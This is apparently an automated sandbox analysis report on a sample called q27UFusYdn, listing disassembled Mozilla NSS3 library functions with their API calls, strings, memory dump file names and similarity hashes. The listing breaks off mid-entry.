Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE0ACE2
malloc.MOZGLUE(00000001), ref: 6CE0ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CE0AD02
TlsGetValue.KERNEL32 ref: 6CE0AD3C
calloc.MOZGLUE(00000001,?), ref: 6CE0AD8C
PR_Unlock.NSS3 ref: 6CE0ADC0
free.MOZGLUE(00000000), ref: 6CE0AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CE0AE58
free.MOZGLUE(00000000), ref: 6CE0AE69
free.MOZGLUE(?), ref: 6CE0AE78
PR_Unlock.NSS3 ref: 6CE0AE8C
free.MOZGLUE(?), ref: 6CE0AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE0AEC7

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 78a34443649ed4bf9e61df56c3ee727fdd889bd0ec6ef8734fb5ffed642172c3
Instruction ID: 8c82c5cf55172ce38885f84c2e9712a6d256be1064eefd5e30fed0cd9530078a
Opcode Fuzzy Hash: 78a34443649ed4bf9e61df56c3ee727fdd889bd0ec6ef8734fb5ffed642172c3
Instruction Fuzzy Hash: 9151E470F601298BDF41EFA8EC417AE7774BB0634DF244125D818A3B01D331A96ACBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE50FE0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE51057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE51085
PK11_GetAllTokens.NSS3 ref: 6CE510B1
free.MOZGLUE(?), ref: 6CE51107
PR_SetError.NSS3(00000000,00000000), ref: 6CE51172
free.MOZGLUE(?), ref: 6CE51182
free.MOZGLUE(?), ref: 6CE511A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CE511C5

Part of subcall function 6CE552C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6CE2EAC5,00000001), ref: 6CE552DF
Part of subcall function 6CE552C0: EnterCriticalSection.KERNEL32(?), ref: 6CE552F3
Part of subcall function 6CE552C0: PR_Unlock.NSS3(?), ref: 6CE55358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CE511D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CE511F3

Strings

5s/, xrefs: 6CE50FEC

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID: 5s/
API String ID: 1549229083-340167759
Opcode ID: 979d4b6770f90fad92b7adb9df64e7585c75a70cf37e150bd5e9302218fa8943
Instruction ID: 60e9a1463b4bd90a6d7dc5c9e2e77870459a84953cadd1c71396e452710d7ed8
Opcode Fuzzy Hash: 979d4b6770f90fad92b7adb9df64e7585c75a70cf37e150bd5e9302218fa8943
Instruction Fuzzy Hash: 3B61E5B1E003459BEB00DFA4DD81BAAB7B4BF04348F744128EC19AB741E772E955CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CEE4CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CEE4CFD
sqlite3_value_text16.NSS3(?), ref: 6CEE4D44

Strings

out of memory, xrefs: 6CEE4C78, 6CEE4C9E
no more rows available, xrefs: 6CEE4D2E
unknown error, xrefs: 6CEE4D56
API call with %s database connection pointer, xrefs: 6CEE4CF6
bad parameter or other API misuse, xrefs: 6CEE4D05
invalid, xrefs: 6CEE4CF1
another row available, xrefs: 6CEE4D20
abort due to ROLLBACK, xrefs: 6CEE4D27, 6CEE4D33

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 2febd359a6206b04a918422c3464eeb9d270fc545b8ce131ef786e55ae727952
Instruction ID: 44bdc81ebc718ea2f5d7d7c6f7009a983468531c37d57fe6bc748877041f7130
Opcode Fuzzy Hash: 2febd359a6206b04a918422c3464eeb9d270fc545b8ce131ef786e55ae727952
Instruction Fuzzy Hash: 263148B3E04C11A7E71546A4A8017E57772B78F39CF364127D4254BF59D725AC2283E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34E50 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE34E90
EnterCriticalSection.KERNEL32 ref: 6CE34EA9
TlsGetValue.KERNEL32 ref: 6CE34EC6
EnterCriticalSection.KERNEL32 ref: 6CE34EDF
PL_HashTableLookup.NSS3 ref: 6CE34EF8
PR_Unlock.NSS3 ref: 6CE34F05
PR_Now.NSS3 ref: 6CE34F13
PR_Unlock.NSS3 ref: 6CE34F3A

Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007AD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007CD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007D6
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CD9204A), ref: 6CE007E4
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,6CD9204A), ref: 6CE00864
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE00880
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,6CD9204A), ref: 6CE008CB
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008D7
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008FB

Strings

5s/, xrefs: 6CE34E62
bUl, xrefs: 6CE34F3F
bUl, xrefs: 6CE34E5C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUl$bUl$5s/
API String ID: 326028414-379148225
Opcode ID: f76a8c3b4b682689dcb9af1e403905054245752cb39d1958f0c102270137e0a6
Instruction ID: ac7000ad549268fe578f563425f932111ebe1cc8841f791fd1aed0e68738fbb1
Opcode Fuzzy Hash: f76a8c3b4b682689dcb9af1e403905054245752cb39d1958f0c102270137e0a6
Instruction Fuzzy Hash: 4E416DB4A106159FCB00EF79C48496ABBF0FF49318B158569EC999B710EB30E855CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5ECE0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CE5DE64), ref: 6CE5ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE5ED22

Part of subcall function 6CE6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF418D0,?), ref: 6CE6B095

PL_FreeArenaPool.NSS3(?), ref: 6CE5ED4A
PL_FinishArenaPool.NSS3(?), ref: 6CE5ED6B
PR_CallOnce.NSS3(6CF72AA4,6CE712D0), ref: 6CE5ED38

Part of subcall function 6CD94C70: TlsGetValue.KERNEL32(?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94C97
Part of subcall function 6CD94C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94CB0
Part of subcall function 6CD94C70: PR_Unlock.NSS3(?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CE5ED52
PR_CallOnce.NSS3(6CF72AA4,6CE712D0), ref: 6CE5ED83
PL_FreeArenaPool.NSS3(?), ref: 6CE5ED95
PL_FinishArenaPool.NSS3(?), ref: 6CE5ED9D

Part of subcall function 6CE764F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CE7127C,00000000,00000000,00000000), ref: 6CE7650E

Strings

5s/, xrefs: 6CE5ECEB
security, xrefs: 6CE5ED06

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security$5s/
API String ID: 3323615905-2291600020
Opcode ID: fe1bab506055a27d1268bdfc5c386a380bf95dff1e25657757ee08ffd009e00a
Instruction ID: 351e48a5a0a73b5b2ea60fe730f65285af5bb1fc1d347e74d2e5c866bb362bab
Opcode Fuzzy Hash: fe1bab506055a27d1268bdfc5c386a380bf95dff1e25657757ee08ffd009e00a
Instruction Fuzzy Hash: 3C113536900614AAEA205771AC44FBB7378AF0260CF640429E854A3E41F72AA52DC7F6

Uniqueness

Uniqueness Score: -1.00%

Function 6CDB2450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CDB24BA
LeaveCriticalSection.KERNEL32(?), ref: 6CDB250D
EnterCriticalSection.KERNEL32(?), ref: 6CDB2554
LeaveCriticalSection.KERNEL32(?), ref: 6CDB25A7
EnterCriticalSection.KERNEL32(?), ref: 6CDB2609
LeaveCriticalSection.KERNEL32(?), ref: 6CDB265F
EnterCriticalSection.KERNEL32(?), ref: 6CDB26A2
LeaveCriticalSection.KERNEL32(?), ref: 6CDB26F5
EnterCriticalSection.KERNEL32(?), ref: 6CDB2764
LeaveCriticalSection.KERNEL32(?), ref: 6CDB2898
EnterCriticalSection.KERNEL32(?), ref: 6CDB28D0
EnterCriticalSection.KERNEL32(?), ref: 6CDB2948
LeaveCriticalSection.KERNEL32(?), ref: 6CDB299B
EnterCriticalSection.KERNEL32(?), ref: 6CDB29E2
LeaveCriticalSection.KERNEL32(?), ref: 6CDB2A31

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: ecff003e135831dc013bc99c316a935fe9fbb59d482e94b3d7835de3171fc468
Instruction ID: 2b6646ad85e482a7a12f454daddf5c91ae42ff5330d05e22e5219cda656fefd4
Opcode Fuzzy Hash: ecff003e135831dc013bc99c316a935fe9fbb59d482e94b3d7835de3171fc468
Instruction Fuzzy Hash: 13F1BF73F11520DBDB4AAF61E99DB7A3730BB07318B19012DD85767A20CB359846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE14880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE148A2
PORT_NewArena_Util.NSS3(00000800), ref: 6CE148C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6CE148D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6CE148FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6CE14908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CE14947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6CE1496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE14988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CF38DAC,?), ref: 6CE149DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE149FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE14ACB

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: 91eb3686f163f2dc98e8fc8c7e869ca9a06598b5c310917676ea2bf77bb0147d
Instruction ID: 7b11f22c3916b9b4cb1e1e6c653c94c1f966324727794d672167646e04603c7a
Opcode Fuzzy Hash: 91eb3686f163f2dc98e8fc8c7e869ca9a06598b5c310917676ea2bf77bb0147d
Instruction Fuzzy Hash: 2451F1B1A087018BEB108F65DC41B9B76F4AF4130CF31412AE919ABF81F775D468CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6CD94C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94C97
EnterCriticalSection.KERNEL32(?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94CB0
PR_Unlock.NSS3(?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94D97
PR_Lock.NSS3(?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94DBA
PR_WaitCondVar.NSS3 ref: 6CD94DD4
PR_Unlock.NSS3(?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94DEF

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 66988120a0bb7ed32f7b820de7b18938b2a6a69a0c77d60d0292f86a90ef12a1
Instruction ID: a2f2dc542bd20e10c3879bbb497893aefd21946b131f2172a15eca5ab02b8e60
Opcode Fuzzy Hash: 66988120a0bb7ed32f7b820de7b18938b2a6a69a0c77d60d0292f86a90ef12a1
Instruction Fuzzy Hash: 5B41A1B9E24714CFCF41AF79D4942597BB0BF06314F168639D8989B721EB30D884CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5CC70 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CE5CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CE5CE16
PR_SetError.NSS3(00000000,00000000), ref: 6CE5D079

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

Strings

5s/, xrefs: 6CE5CC82

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID: 5s/
API String ID: 1351604052-340167759
Opcode ID: ff061e86ad2119e1ea7f578474b9cb41fee51e19405763131d9d239fb054367a
Instruction ID: b0b05674382b2959f563a878b8e49bb37779f2439686af2c25aa0a45a95983dc
Opcode Fuzzy Hash: ff061e86ad2119e1ea7f578474b9cb41fee51e19405763131d9d239fb054367a
Instruction Fuzzy Hash: BFC190B5A002199BDB10CF24CC80BDAB7B5BF49318F6441A8D94CA7741E776EEA5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE12C30 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(73350DE1), ref: 6CE12C5D

Part of subcall function 6CE70D30: calloc.MOZGLUE ref: 6CE70D50
Part of subcall function 6CE70D30: TlsGetValue.KERNEL32 ref: 6CE70D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CE12C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE12CE0

Part of subcall function 6CE12E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CE12CDA,?,00000000), ref: 6CE12E1E
Part of subcall function 6CE12E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CE12E33
Part of subcall function 6CE12E00: TlsGetValue.KERNEL32 ref: 6CE12E4E
Part of subcall function 6CE12E00: EnterCriticalSection.KERNEL32(?), ref: 6CE12E5E
Part of subcall function 6CE12E00: PL_HashTableLookup.NSS3(?), ref: 6CE12E71
Part of subcall function 6CE12E00: PL_HashTableRemove.NSS3(?), ref: 6CE12E84
Part of subcall function 6CE12E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CE12E96
Part of subcall function 6CE12E00: PR_Unlock.NSS3 ref: 6CE12EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE12D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CE12D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CE12D3F
free.MOZGLUE(00000000), ref: 6CE12D73
CERT_DestroyCertificate.NSS3(?), ref: 6CE12DB8
free.MOZGLUE ref: 6CE12DC8

Part of subcall function 6CE13E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE13EC2
Part of subcall function 6CE13E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE13ED6
Part of subcall function 6CE13E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE13EEE
Part of subcall function 6CE13E60: PR_CallOnce.NSS3(6CF72AA4,6CE712D0), ref: 6CE13F02
Part of subcall function 6CE13E60: PL_FreeArenaPool.NSS3 ref: 6CE13F14
Part of subcall function 6CE13E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE13F27

Strings

5s/, xrefs: 6CE12C42

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID: 5s/
API String ID: 3941837925-340167759
Opcode ID: 6e5715330d98768c5573b37a752d3fa07a992e7a9ddfa4def5646b24c2ed137f
Instruction ID: 13f3a45efc602b2912fcd6380d59a60ad3da773d11af6983808c73679281b673
Opcode Fuzzy Hash: 6e5715330d98768c5573b37a752d3fa07a992e7a9ddfa4def5646b24c2ed137f
Instruction Fuzzy Hash: 8751EF71A183119BEB019E29DC88B6B77F5EFA634CF24042CEC5593B50E731E825CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE38FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE38FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE38FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CE39013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE39042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE3905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CE39073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE390EC

Part of subcall function 6CE00F00: PR_GetPageSize.NSS3(6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F1B
Part of subcall function 6CE00F00: PR_NewLogModule.NSS3(clock,6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE2DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE39111

Strings

5s/, xrefs: 6CE38F7C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
